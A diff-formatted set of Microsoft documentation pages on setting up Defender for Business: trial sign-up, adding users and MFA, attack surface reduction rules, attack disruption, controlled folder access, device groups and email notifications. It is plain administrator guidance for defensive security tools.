-2. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and either sign in using your existing work or school account, or follow the prompts to create a new account.
-
-3. In the [Microsoft Defender portal](https://security.microsoft.com), in the navigation bar, go to **Assets** > **Devices**. This action initiates the provisioning of Defender for Business for your tenant. You know this process has started when you see a message like what's displayed in the following screenshot:
-
- :::image type="content" source="media/mdb-hangon-provisioning.png" alt-text="Screenshot of provisioning message in Defender for Business.":::
-
- It might take a few hours for your tenant to finish provisioning before you can onboard devices or complete the setup and configuration process.
-
-> [!NOTE]
-> If you have Microsoft 365 Business Premium and you haven't set it up yet, see [Microsoft 365 Business Premium ΓÇô productivity and cybersecurity for small business](../../business-premium/m365bp-overview.md). This guidance walks you through how to set up and configure all of your productivity and security capabilities, including Defender for Business.
-
-## [Get Microsoft 365 Business Premium](#tab/getpremium)
-
-Microsoft 365 Business Premium includes Defender for Business, Microsoft Defender for Office 365 Plan 1, and Microsoft 365 Apps (formerly referred to as Office apps). For more information, see [Productivity and security for small and medium-sized businesses](../../business-premium/why-choose-microsoft-365-business-premium.md).
-
-1. Visit the [Microsoft 365 Business Premium product page](https://www.microsoft.com/microsoft-365/business/microsoft-365-business-premium?activetab=pivot%3aoverviewtab).
-
-2. Choose to try or buy your subscription. See [Try or buy a Microsoft 365 for business subscription](../../commerce/try-or-buy-microsoft-365.md). On the [Microsoft 365 Products site](https://www.aka.ms/office365signup), choose **Microsoft 365 Business Premium**.
-
-3. After you've signed up for Microsoft 365 Business Premium, you'll receive an email with a link to sign in and get started. Proceed to [Set up Microsoft 365 Business Premium](../../business-premium/m365-business-premium-setup.md).
-
-4. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), where you view and manage security settings and devices for your organization. In the navigation bar, go to **Assets** > **Devices**. This action initiates the provisioning of Defender for Business for your tenant.
-
-5. Follow the guidance in [Boost your security protection](../../business-premium/m365bp-security-overview.md) to set up your security capabilities.
-
-> [!IMPORTANT]
-> Make sure to complete all the steps described in [Microsoft 365 Business Premium ΓÇô productivity and cybersecurity for small business](../../business-premium/m365bp-overview.md).
-
-## [Work with a Microsoft partner](#tab/findpartner)
-
-Microsoft has a list of solution providers who are authorized to sell offerings, including Microsoft 365 Business Premium and Microsoft Defender for Business. If you'd prefer to work with a Microsoft partner, you can follow these steps to find a solution provider in your area:
-
-1. Go to the [Browse Partners](https://appsource.microsoft.com/marketplace/partner-dir).
-
-2. In the **Filters** pane, specify search criteria, such as:
-
- - Your location
- - Your organization's size
- - **Focus areas**, such as **Security** and/or **Threat Protection**
- - **Services**, such as **Licensing** or **Managed Services (MSP)**
-
- As soon as you select one or more criteria, the list of partners updates.
-
-3. Review the list of results. Select a provider to learn more about their expertise and the services they provide.
---
-## How to get Microsoft Defender for Business servers
-
-Microsoft Defender for Business servers is an add-on to Defender for Business that enables you to secure your server operating systems with the same protection that you get for client devices in Defender for Business.
-
-1. Go to the Microsoft 365 admin center ([https://admin.microsoft.com/](https://admin.microsoft.com/)), and sign in.
-
-2. In the navigation pane, choose **Billing** > **Purchase services**.
-
-3. In the list of results, select the **Details** box for **Microsoft Defender for Business servers**.
-
-4. Review the information, and complete the purchase process. You need one Microsoft Defender for Business servers license for each instance of Windows Server or Linux, and you don't assign that license to users or devices.
-
-> [!IMPORTANT]
-> - In order to add on Microsoft Defender for Business servers, you'll need at least one paid license for [Defender for Business](mdb-overview.md) (standalone) or [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md).
-> - There's a limit of 60 Microsoft Defender for Business servers licenses per subscription to Microsoft 365 Business Premium or Defender for Business.
-> - If preferred, you could use [Microsoft Defender for Servers Plan 1 or Plan 2](/azure/defender-for-cloud/plan-defender-for-servers) instead to onboard your servers. To learn more, see [What happens if I have a mix of Microsoft endpoint security subscriptions](mdb-faq.yml#what-happens-if-i-have-a-mix-of-microsoft-endpoint-security-subscriptions)?
-
-
-## Portals you use for setup and management
-
-When you use Defender for Business, you work with two main portals:
--- The Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com))-- The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com))-
-If your subscription also includes Microsoft Intune, you use the Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)) as well. The following table summarizes these portals and how you use them.
-
-|Portal |Description |
-|||
-| The Microsoft 365 admin center ([https://admin.microsoft.com/](https://admin.microsoft.com/)) | Use the Microsoft 365 admin center to activate your trial and sign in for the first time. You can also use the Microsoft 365 admin center to: <br/>- Add or remove users.<br/>- Assign user licenses.<br/>- View your products and services.<br/>- Complete setup tasks for your Microsoft 365 subscription.<br/><br/>To learn more, see [Overview of the Microsoft 365 admin center](../../admin/admin-overview/admin-center-overview.md). |
-| The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) | Use the Microsoft Defender portal to set up and configure Defender for Business, and to monitor your devices and threat detections. You use the Microsoft Defender portal to: <br/>- View your devices and device protection policies.<br/>- View detected threats and take action.<br/>- View security recommendations and manage your security settings.<br/><br/>To learn more, see [Get started using the Microsoft Defender portal](mdb-get-started.md). |
-| The Intune admin center ([https://intune.microsoft.com/](https://intune.microsoft.com/)) | Use the Intune admin center to set up multifactor authentication (MFA), onboard iOS and Android devices, and configure certain capabilities, such as [attack surface reduction rules](mdb-asr.md).<br/><br/>To learn more about Intune, see [Microsoft Intune is an MDM and MAM provider for your devices](/mem/intune/fundamentals/what-is-intune). |
-
-## Next step
--- Proceed to [Step 2: Add users and assign licenses in Microsoft Defender for Business](mdb-add-users.md).-
security Mdb Add Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-add-users.md
- Title: Add users and assign licenses in Microsoft Defender for Business
-description: Add users and assign Defender for Business licenses to protect their devices
----- Previously updated : 05/01/2023--- m365-security-- tier1---
-# Add users and assign licenses in Microsoft Defender for Business
-
-As soon as you have signed up for Defender for Business, your first step is to add users and assign licenses. This article describes how to add users and assign licenses, and how to make sure multifactor authentication (MFA) is enabled.
--
-## Add users and assign licenses
-
-> [!IMPORTANT]
-> You must be a global administrator to perform this task. The person who signed up your company for Microsoft 365 or for Defender for Business is a global administrator by default.
-
-1. Go to the Microsoft 365 admin center at [https://admin.microsoft.com](https://admin.microsoft.com) and sign in.
-
-2. Go to **Users** > **Active users**, and then select **Add a user**.
-
-3. In the **Set up the basics** pane, fill in the basic user information, and then select **Next**.
-
- - **Name**: Fill in the first and last name, display name, and username.
- - **Domain** Choose the domain for the user's account. For example, if the user's username is `Pat`, and the domain is `contoso.com`, they'll sign in by using `pat@contoso.com`.
- - **Password settings**: Choose whether to use the autogenerated password or to create your own strong password for the user. The user must change their password after 90 days. Or you can choose the option to **Require this user to change their password when they first sign in**. You can also choose whether you want to send the user's password in email when the user is added.
-
-4. On the **Assign product licenses** page, select Defender for Business (or Microsoft 365 Business Premium). Then choose **Next**.
-
- If you don't have any licenses available, you can still add a user and buy additional licenses. For more information about adding users, see [Add users and assign licenses at the same time](../../admin/add-users/add-users.md).
-
-5. On the **Optional settings** page, you can expand **Profile info** and fill in details, such as the user's job title, department, location, and so forth. Then choose **Next**.
-
-6. On the **Review and finish** page, review the details, and then select **Finish adding** to add the user. If you need to make any changes, choose **Back** to go back to a previous page.
-
-## Make sure MFA is enabled
-
-One good way to make sure MFA is enabled for all users is by using [security defaults](/azure/active-directory/fundamentals/concept-fundamentals-security-defaults). If your tenant was created on or after October 22, 2019, security defaults might be enabled automatically in your tenant. Use the following procedure to confirm or enable security defaults.
-
-> [!IMPORTANT]
-> You must be a security administrator, Conditional Access administrator, or Global Administrator to perform this task.
-
-1. Go to the Azure portal ([https://portal.azure.com/](https://portal.azure.com/)) and sign in.
-
-2. Under **Manage Microsoft Entra ID**, select **View**.
-
- :::image type="content" source="medib-manage-azuread.png":::
-
-3. In the navigation pane, select **Properties**, and then select **Manage security defaults**.
-
- :::image type="content" source="medib-azuread-properties.png":::
-
-4. On the right side of the screen, in the **Security defaults** pane, see whether security defaults are turned on (**Enabled**) or off (**Disabled**). To turn security defaults on, use the drop-down menu to select **Enabled**.
-
- > [!CAUTION]
- > If your organization is using Conditional Access policies, you won't be able to enable security defaults. You'll see a message that indicates you're using classic policies instead. You can use *either* security defaults *or* Conditional Access, but not both. For most organizations, security defaults offer a good level of sign-in security. But if your organization must meet more stringent requirements, you can use Conditional Access policies instead. To learn more, see the following articles:
- > - [Multi-factor authentication](../../business-premium/m365bp-turn-on-mfa.md) (in the Microsoft 365 Business Premium documentation)
- > - [Security defaults in Microsoft Entra ID](/azure/active-directory/fundamentals/concept-fundamentals-security-defaults)
-
-5. Save your changes.
-
-## Next steps
--- [Step 3: Assign security roles and permissions in Microsoft Defender for Business](mdb-roles-permissions.md).-- [Step 4: Set up email notifications for your security team](mdb-email-notifications.md).-
security Mdb Asr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-asr.md
- Title: Enable your attack surface reduction rules in Microsoft Defender for Business
-description: Get an overview of attack surface reduction capabilities, including attack surface reduction rules, in Microsoft Defender for Business
--- Previously updated : 11/30/2023----- m365-security-- tier1---
-# Enable your attack surface reduction rules in Microsoft Defender for Business
-
-Your attack surfaces are all the places and ways that your organization's network and devices are vulnerable to cyberthreats and attacks. Unsecured devices, unrestricted access to any URL on a company device, and allowing any type of app or script to run on company devices are all examples of attack surfaces. They leave your company vulnerable to cyberattacks.
-
-To help protect your network and devices, Microsoft Defender for Business includes several attack surface reduction capabilities, including attack surface reduction rules. This article describes how to set up your attack surface reduction rules and describes attack surface reduction capabilities.
-
-> [!NOTE]
-> Intune is not included in the standalone version of Defender for Business, but it can be added on.
-
-## Standard protection ASR rules
-
-There are lots of attack surface reduction rules available. You don't have to set them all up at once. And, you can set up some rules in audit mode just to see how they work for your organization, and change them to work in block mode later. That said, we recommend enabling the following standard protection rules as soon as possible:
--- [Block credential stealing from the Windows local security authority subsystem](../defender-endpoint/attack-surface-reduction-rules-reference.md#block-credential-stealing-from-the-windows-local-security-authority-subsystem)-- [Block abuse of exploited vulnerable signed drivers](../defender-endpoint/attack-surface-reduction-rules-reference.md#block-abuse-of-exploited-vulnerable-signed-drivers)-- [Block persistence through WMI event subscription](../defender-endpoint/attack-surface-reduction-rules-reference.md#block-persistence-through-wmi-event-subscription)-
-These rules help protect your network and devices but shouldn't cause disruption for users. Use Intune to set up your attack surface reduction rules.
-
-## Set up ASR rules using Intune
-
-1. As a global administrator, in the Microsoft Intune admin center ([https://intune.microsoft.com/](https://intune.microsoft.com/)), go to **Endpoint security** > **Attack surface reduction**.
-
-2. Choose **Create policy** to create a new policy.
-
- - For **Platform**, choose **Windows 10, Windows 11, and Windows Server**.
- - For Profile, select **Attack Surface Reduction Rules**, and then choose **Create**.
-
-3. Set up your policy as follows:
-
- 1. Specify a name and description, and then choose **Next**.
-
- 2. For at least the following three rules, set each one to **Block**:
-
- - **Block credential stealing from the Windows local security authority subsystem**
- - **Block persistence through WMI event subscription**
- - **Block abuse of exploited vulnerable signed drivers**
-
- Then choose **Next**.
-
- 3. On the **Scope tags** step, choose **Next**.
-
- 4. On the **Assignments** step, choose the users or devices to receive the rules, and then choose **Next**. (We recommend selecting **Add all devices**.)
-
- 5. On the **Review + create** step, review the information, and then choose **Create**.
-
-> [!TIP]
-> If you prefer, you can set up your attack surface reduction rules in audit mode at first to see detections before files or processes are actually blocked. For more detailed information about attack surface reduction rules, see [Attack surface reduction rules deployment overview](../defender-endpoint/attack-surface-reduction-rules-deployment.md).
-
-## View your attack surface reduction report
-
-Defender for Business includes an attack surface reduction report that shows how attack surface reduction rules are working for you.
-
-1. As a global administrator, in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the navigation pane, choose **Reports**.
-
-2. Under **Endpoints**, choose **Attack surface reduction rules**. The report opens and includes three tabs:
-
- - **Detections**, where you can view detections that occurred as a result of attack surface reduction rules
- - **Configuration**, where you can view data for standard protection rules or other attack surface reduction rules
- - **Add exclusions**, where you can add items to be excluded from attack surface reduction rules (use exclusions sparingly; every exclusion reduces your level of security protection)
-
-To learn more about attack surface reduction rules, see the following articles:
--- [Attack surface reduction rules overview](../defender-endpoint/attack-surface-reduction.md)-- [Attack surface reduction rules report](../defender-endpoint/attack-surface-reduction-rules-report.md)-- [Attack surface reduction rules reference](../defender-endpoint/attack-surface-reduction-rules-reference.md)-- [Attack surface reduction rules deployment overview](../defender-endpoint/attack-surface-reduction-rules-deployment.md)-
-## Attack surface reduction capabilities in Defender for Business
-
-Attack surface reduction rules are available in Defender for Business. The following table summarizes attack surface reduction capabilities in Defender for Business. Notice how other capabilities, such as next-generation protection and web content filtering, work together with your attack surface reduction capabilities.
-
-| Capability | How to set it up |
-|:|:|
-| **Attack surface reduction rules** <br/> Prevent specific actions that are commonly associated with malicious activity to run on Windows devices. | [Enable your standard protection attack surface reduction rules](#standard-protection-asr-rules) (section in this article). |
-| **Controlled folder access** <br/>Controlled folder access allows only trusted apps to access protected folders on Windows devices. Think of this capability as ransomware mitigation. | [Set up controlled folder access policy in Microsoft Defender for Business](mdb-controlled-folder-access.md). |
-| **Network protection** <br/>Network protection prevents people from accessing dangerous domains through applications on their Windows and Mac devices. Network protection is also a key component of [Web content filtering in Microsoft Defender for Business](mdb-web-content-filtering.md). | Network protection is already enabled by default when devices are onboarded to Defender for Business and [next-generation protection policies in Defender for Business](mdb-next-generation-protection.md) are applied. Your default policies are configured to use recommended security settings. |
-| **Web protection** <br/>Web protection integrates with web browsers and works with network protection to protect against web threats and unwanted content. Web protection includes web content filtering and web threat reports. | [Set up Web content filtering in Microsoft Defender for Business](mdb-web-content-filtering.md). |
-| **Firewall protection** <br/>Firewall protection determines what network traffic is permitted to flow to or from your organization's devices. | Firewall protection is already enabled by default when devices are onboarded to Defender for Business and [firewall policies in Defender for Business](mdb-firewall.md) are applied. |
-
-## Next steps
--- [Review settings for advanced features and the Microsoft Defender portal](mdb-portal-advanced-feature-settings.md).-- [Use your vulnerability management dashboard](mdb-view-tvm-dashboard.md)-- [View and manage incidents](mdb-view-manage-incidents.md)-- [View reports](mdb-reports.md)-
security Mdb Attack Disruption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-attack-disruption.md
- Title: Automatic attack disruption in Microsoft Defender for Business
-description: Learn about automatic attack disruption in Microsoft Defender for Business
--- Previously updated : 10/12/2023----- m365-security-- tier1---
-# Automatic attack disruption in Microsoft Defender for Business
-
-A human-operated attack is an active attack by cybercriminals who infiltrate an organization, elevate their privileges, navigate the network, and deploy ransomware or steal information. These types of attacks can be catastrophic to business operations, tend to be difficult to address, and sometimes continue to threaten business operations after the initial encounter. For more information, see [Human-operated ransomware attacks](/security/ransomware/human-operated-ransomware#human-operated-ransomware-attacks).
-
-To help protect against human-operated or other advanced attacks, Microsoft Defender XDR added [automatic attack disruption](../defender/automatic-attack-disruption.md) in November 2022 for enterprise customers. Now, these capabilities are coming to Defender for Business! This article describes how automatic attack disruption works, how to view details about an attack, and how to get these capabilities.
-
-## How automatic attack disruption works
-
-Automatic attack disruption is designed to:
--- Contain advanced attacks that are in progress;-- Limit the impact and progression of attacks on your business assets (like devices); and-- Provide more time for your IT/security team to remediate an attack fully. -
-Automatic attack disruption uses insights from Microsoft security researchers and advanced AI models to counteract the complexities of advanced attacks. It limits a threat actor's progress early on and dramatically reduces the overall impact of an attack, from associated costs to loss of productivity. See some examples at the [Microsoft Security Blog](https://aka.ms/ContainUserSecBlog).
-
-With automatic attack disruption, as soon as a human-operated attack is detected on a device, steps are taken immediately to contain the affected device and user accounts on the device. An incident is created in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). There, your IT/security team can view details about the risk and containment status of compromised assets during and after the process. An **Incident** page provides details about the attack and up-to-date status of affected assets.
-
-Automated response actions include:
--- Containing a device by blocking incoming/outgoing communication-- Containing a user account by disconnecting current user connections at the device level-
-> [!IMPORTANT]
-> - To view information about a detected advanced attack, you must have the Security Reader, Security Administrator, or Global Administrator role assigned.
-> - To take remediation actions, release a contained device/user, or re-enable a user account, you must have either the Security Administrator or Global Administrator role assigned.
-> - See [Security roles and permissions in Defender for Business](mdb-roles-permissions.md).
-
-<a name='view-details-about-an-attack-in-the-microsoft-365-defender-portal'></a>
-
-## View details about an attack in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal, go to **Incidents**.
-
-2. Select an incident that is tagged with *Attack Disruption*.
-
-3. Review the incident graph, which enables you to get the entire attack story and assess the attack disruption impact and status.
-
-4. When you're ready to release a contained device or user account, or re-enable a user account, take one of the following steps:
-
- - To release a contained device, select the device, and then choose **Release from containment**.
- - To release a contained user, select the user account, and then, in the side pane, select **Undo**.
-
-Disrupted incidents include a tag for `Attack Disruption` and the specific threat type identified (such as ransomware). If your IT/security team receives [incident email notifications](mdb-email-notifications.md), these tags also appear in the emails.
-
-When an incident is disrupted, highlighted text appears below the incident title. Contained devices or user accounts are listed with a label that indicates their status.
-
-## Track attack disruption actions in the Action center
-
-The [Action center](mdb-review-remediation-actions.md) brings together all remediation and response actions, whether those actions were taken automatically or manually. You can view all automatic attack disruption actions in the Action center. And, after your IT/security team has mitigated the risk and completed the investigation of an incident, they can release contained assets.
-
-1. In the Microsoft Defender portal, go to **Actions & submissions** > **Action center**.
-
-2. Select the **History** tab.
-
-3. Select an action, such as **Contain user** or **Contain device**, and then choose **Undo**.
-
-For more information, see [Review remediation actions in the Action center](mdb-review-remediation-actions.md).
-
-## How to get automatic attack disruption
-
-Automatic attack disruption is built into Defender for Business; you don't have to explicitly turn on these capabilities. It's important to [onboard all your organization's devices](mdb-onboard-devices.md) (computers, phones, and tablets) to Defender for Business so that they're protected as soon as possible.
-
-Additionally, sign up to receive [preview features](mdb-preview.md) so that you get the latest and greatest capabilities as soon as they're available.
-
security Mdb Configure Security Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-configure-security-settings.md
- Title: Set up, review, and edit your security policies and settings in Microsoft Defender for Business
-description: View and edit security policies and settings in Defender for Business
----- Previously updated : 05/05/2023----
-# Set up, review, and edit your security policies and settings in Microsoft Defender for Business
-
-This article walks you through how to review, create, or edit your security policies, and how to navigate advanced settings in Defender for Business.
--
-## Default policies
-
-When you're setting up (or maintaining) Defender for Business, an important part of the process includes reviewing your default policies, such as:
--- [Next-generation protection](mdb-next-generation-protection.md)-- [Firewall protection](mdb-firewall.md)-
-## Additional policies
-
-In addition to your default security policies, you can add other policies, such as:
--- [Web content filtering](mdb-web-content-filtering.md)-- [Controlled folder access](mdb-controlled-folder-access.md) (*requires Microsoft Intune*)-- [Attack surface reduction rules](mdb-asr.md) (*ASR rules are configured in Intune*)-
-## Advanced features and settings
-
-You can view and edit settings for advanced features, such as:
--- [Turning on (or off) advanced features](mdb-portal-advanced-feature-settings.md#view-settings-for-advanced-features);-- [Specifying which time zone to use in the Microsoft Defender portal](mdb-portal-advanced-feature-settings.md#view-and-edit-other-settings-in-the-microsoft-365-defender-portal); and -- [Whether to receive preview features as they become available](mdb-preview.md#turn-on-preview-features).-
-## Choose where to manage security policies and devices
-
-Before you begin setting up your security policies, you'll need to choose which portal you want to use. You can choose to use either the Microsoft Defender portal or the Microsoft Intune admin center to onboard devices and create or edit security policies. The following table explains both options.
-
-| Option | Description |
-|:|:|
-| **Microsoft Defender portal** | The Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)) is a one-stop shop for managing your company's devices, security policies, and security settings in Defender for Business. With a simplified configuration process, you can use the Microsoft Defender portal to onboard devices, access your security policies and settings, use the [Microsoft Defender Vulnerability Management dashboard](mdb-view-tvm-dashboard.md), and [view and manage incidents](mdb-view-manage-incidents.md) in one place. <br/><br/>Note that currently, controlled folder access and attack surface reduction rules are set up and configured in the Microsoft Intune admin center. |
-| **Microsoft Intune admin center** | The Microsoft Intune admin center ([https://intune.microsoft.com/](https://intune.microsoft.com/)) lets you manage your workforce's devices and apps, including how they access your company data. You can onboard devices and access your security policies and settings in Intune. You can also use Intune to set up and configure attack surface reduction rules in Defender for Business. Intune is not included in the standalone version of Defender for Business, but it can be added on. <br/><br/>If your company has been using Intune, you can choose to continue using it to manage your devices and security policies. To learn more, see [Manage device security with endpoint security policies in Microsoft Intune](/mem/intune/protect/endpoint-security-policy) |
-
-If you're using Intune, and you attempt to view or edit security policies in the Microsoft Defender portal by going to **Configuration management** > **Device configuration**, you'll be prompted to choose whether to continue using Intune, or switch to using the Microsoft Defender portal instead, as shown in the following screenshot:
--
-In the preceding image, **Use Defender for Business configuration instead** refers to using the Microsoft Defender portal, which provides a simplified configuration experience designed for small and medium-sized businesses. If you opt to use the Microsoft Defender portal, you must delete any existing security policies in Intune to avoid policy conflicts. For more details, see [I need to resolve a policy conflict](/microsoft-365/security/defender-business/mdb-troubleshooting#i-need-to-resolve-a-policy-conflict).
-
-> [!NOTE]
-> If you're managing your security policies in the Microsoft Defender portal, you can view those policies in the Intune admin center, where they're listed as **Antivirus** or **Firewall** policies. When you view your firewall policies in the Intune admin center, you'll see two policies listed: one policy for firewall protection and another for custom rules.
->
-> You can export your list of policies through the [Microsoft Intune admin center](https://intune.microsoft.com/).
-
-## Next steps
-
-1. [Review or edit your next-generation protection policies](mdb-next-generation-protection.md) to apply antivirus/antimalware protection, and enable network protection.
-2. [Review or edit your firewall policies](mdb-firewall.md).
-3. [Set up your web content filtering policy](mdb-web-content-filtering.md) and enable web protection automatically.
-4. [Set up your controlled folder access policy](mdb-controlled-folder-access.md) for ransomware protection.
-5. [Enable your attack surface reduction rules](mdb-asr.md).
-6. [Review settings for advanced features and the Microsoft Defender portal](mdb-portal-advanced-feature-settings.md).
-
security Mdb Controlled Folder Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-controlled-folder-access.md
- Title: Set up or edit your controlled folder access policy in Microsoft Defender for Business
-description: Get an overview of attack surface reduction capabilities in Microsoft Defender for Business
--- Previously updated : 08/21/2023----- m365-security-- tier1---
-# Set up or edit your controlled folder access policy in Microsoft Defender for Business
-
-Controlled folder access allows only trusted apps to access protected folders on Windows devices. Think of this capability as ransomware mitigation. You can set up or edit your controlled folder access policy using Microsoft Intune.
-
-## Set up controlled folder access
-
-1. As a global administrator, in the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Endpoint security** > **Attack surface reduction**.
-
-2. Select an existing policy, or choose **Create policy** to create a new policy.
-
- - For **Platform**, choose **Windows 10 and later**.
- - For Profile, select **Attack Surface Reduction Rules**, and then choose **Create**.
-
-3. Set up your policy as follows:
-
- 1. Specify a name and description, and then choose **Next**.
-
- 2. Scroll down, and set **Enable Controlled Folder Access** to **Enabled**. Then choose **Next**.
-
- 3. On the **Scope tags** step, choose **Next**.
-
- 4. On the **Assignments** step, choose the users or devices to receive the rules, and then choose **Next**. (We recommend selecting **Add all devices**.)
-
- 5. On the **Review + create** step, review the information, and then choose **Create**.
-
-To learn more about controlled folder access, see [Protect important folders with controlled folder access](../defender-endpoint/controlled-folders.md).
-
-## Next steps
--- [Enable your attack surface reduction rules](mdb-asr.md)-- [Review settings for advanced features and the Microsoft Defender portal](mdb-portal-advanced-feature-settings.md).-
security Mdb Create Edit Device Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-create-edit-device-groups.md
- Title: Device groups in Microsoft Defender for Business
-description: Security policies are applied to devices through device groups in Defender for Business.
------ Previously updated : 05/17/2023--- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# Device groups in Microsoft Defender for Business
-
-In Defender for Business, policies are applied to devices through certain collections that are called device groups.
-
-**This article describes**:
--- [What device groups are](#what-is-a-device-group) -- [How to create device groups in Defender for Business](#create-a-new-device-group)-- [How to view an existing device group](#view-an-existing-device-group)-- [What the Add All Devices option does](#what-does-the-add-all-devices-option-do)--
-## What is a device group?
-
-A device group is a collection of devices that are grouped together because of certain specified criteria, such as operating system version. Devices that meet the criteria are included in that device group, unless you exclude them. In Defender for Business, policies are applied to devices by using device groups.
-
-Defender for Business includes default device groups that you can use. The default device groups include all the devices that are onboarded to Defender for Business. For example, there's a default device group for Windows devices. Whenever you onboard Windows devices, they're added to the default device group automatically.
-
-You can also create new device groups to assign policies with specific settings to certain devices. For example, you might have a firewall policy assigned to one set of Windows devices, and a different firewall policy assigned to another set of Windows devices. You can define specific device groups to use with your policies.
-
-> [!NOTE]
-> As you create policies in Defender for Business, an order of priority is assigned. If you apply multiple policies to a given set of devices, those devices will receive the first applied policy only. For more information, see [Understand policy order in Defender for Business](mdb-policy-order.md).
-
-All device groups, including your default device groups and any custom device groups that you define, are stored in [Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-whatis) (Microsoft Entra ID).
-
-## Create a new device group
-
-Currently, in Defender for Business, you can create a new device group while you are in the process of creating or editing a policy, as described in the following procedure:
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, choose **Configuration management** and select **Device configuration**.
-
-3. Take one of the following actions:
-
- 1. Select an existing policy, and then choose **Edit**.
- 2. Choose **+ Add** to create a new policy.
-
- > [!TIP]
- > To get help creating or editing a policy, see [View or edit policies in Defender for Business](mdb-view-edit-policies.md).
-
-4. On the **General information** step, review the information, edit if necessary, and then choose **Next**.
-
-5. Choose **+ Create new group**.
-
-6. Specify a name and description for the device group, and then choose **Next**.
-
-7. Select the devices to include in the group, and then choose **Create group**.
-
-8. On the **Device groups** step, review the list of device groups for the policy. If needed, remove a group from the list. Then choose **Next**.
-
-9. On the **Configuration settings** page, review and edit settings as needed, and then choose **Next**. For more information about these settings, see [Configuration settings](mdb-next-generation-protection.md).
-
-10. On the **Review your policy** step, review all the settings, make any needed edits, and then choose **Create policy** or **Update policy**.
-
-## View an existing device group
-
-Currently, in Defender for Business, you can view your existing device groups while you are in the process of creating or editing a policy, as described in the following procedure:
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, choose **Device configuration**.
-
-3. Take one of the following actions:
-
- 1. Select an existing policy, and then choose **Edit**.
- 2. Choose **+ Add** to create a new policy.
-
- > [!TIP]
- > To get help creating or editing a policy, see [View or edit policies in Defender for Business](mdb-view-edit-policies.md).
-
-4. On the **General information** step, review the information, edit if necessary, and then choose **Next**.
-
-5. Choose **Use existing group**. A flyout opens and displays device groups. If you don't have any device groups yet, you'll be prompted to create a new device group.
-
-## What does the Add All Devices option do?
-
-When you are creating or editing a policy, you might see the **Add all devices** option.
--
-If you select this option, all devices that are enrolled in Microsoft Intune will receive the policy that you are creating or editing by default.
-
-## Next steps
-
-Choose one or more of the following tasks:
--- [View or edit policies](mdb-view-edit-policies.md)-- [Create a new policy](mdb-create-new-policy.md)-- [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md)-- [Respond to and mitigate threats in Defender for Business](mdb-respond-mitigate-threats.md)-- [Review remediation actions in the Action center](mdb-review-remediation-actions.md)-
security Mdb Email Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-email-notifications.md
- Title: Set up email notifications for your security team
-description: Set up email notifications to tell your security team about alerts and vulnerabilities in Defender for Business.
------ Previously updated : 05/01/2023---
-# Set up email notifications
-
-This article describes how to set up email notifications for your security team.
--
-When you can set up email notifications for your security team, they can be notified via email whenever any alerts are generated, or new vulnerabilities are discovered.
-
-## What to do
-
-1. [Learn about types of email notifications](#types-of-email-notifications).
-2. [View and edit email notification settings](#view-and-edit-email-notifications).
-3. [Proceed to your next steps](#next-steps).
-
-## Types of email notifications
-
-When you set up email notifications, you can choose from two types, as described in the following table:
-
-| Notification type | Description |
-|||
-| Vulnerabilities | Whenever any new exploits or vulnerability events are detected, recipients receive an email. |
-| Alerts & vulnerabilities | When alerts are generated because threats are detected on devices, or when any new exploits or vulnerability events are detected, recipients receive an email. |
-
-> [!TIP]
-> **Email notifications are not the only way your security team can find out about new alerts or vulnerabilities**.
->
-> Email notifications are a convenient way to help keep your security team informed, in real time. But there are others! For example, whenever your security team signs into the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), they'll see cards highlighting new threats, alerts, and vulnerabilities. Defender for Business is designed to highlight important information that your security team cares about as soon as they sign in.
->
-> Your security team can also choose **Incidents** in the navigation pane to view information. To learn more, see [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md).
-
-## View and edit email notifications
-
-To view or edit email notification settings for your company, follow these steps:
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, select **Settings**, and then select **Endpoints**. Then, under **General**, select **Email notifications**.
-
-3. Review the information on the **Alerts** and **Vulnerabilities** tabs.
-
- - If you don't see any items listed on the **Alerts** tab, you can create a rule for people to be notified when alerts are generated. To get help with this task, see [Create rules for alert notifications](../defender-endpoint/configure-email-notifications.md).
-
- - If you don't see any items listed on the **Vulnerabilities** tab, you can create a rule for people to be notified whenever a new vulnerability is discovered. To get help with this task, see [Create rules for vulnerability events](../defender-endpoint/configure-vulnerability-email-notifications.md).
-
- - If you do have rules created, select a rule to edit it. You can also delete a rule.
-
-> [!IMPORTANT]
-> When you set up email notifications in Defender for Business, you must assign the notification rules to specific users. Defender for Business doesn't use [role-based access control like Defender for Endpoint does](../defender-endpoint/rbac.md). Also, email notifications cannot be applied to device groups in Defender for Business.
-
-## Next steps
-
-Proceed to:
--- [Step 5: Onboard devices to Defender for Business](mdb-onboard-devices.md)-- [Step 6: Set up, review, and edit your security policies and settings in Microsoft Defender for Business](mdb-configure-security-settings.md)-
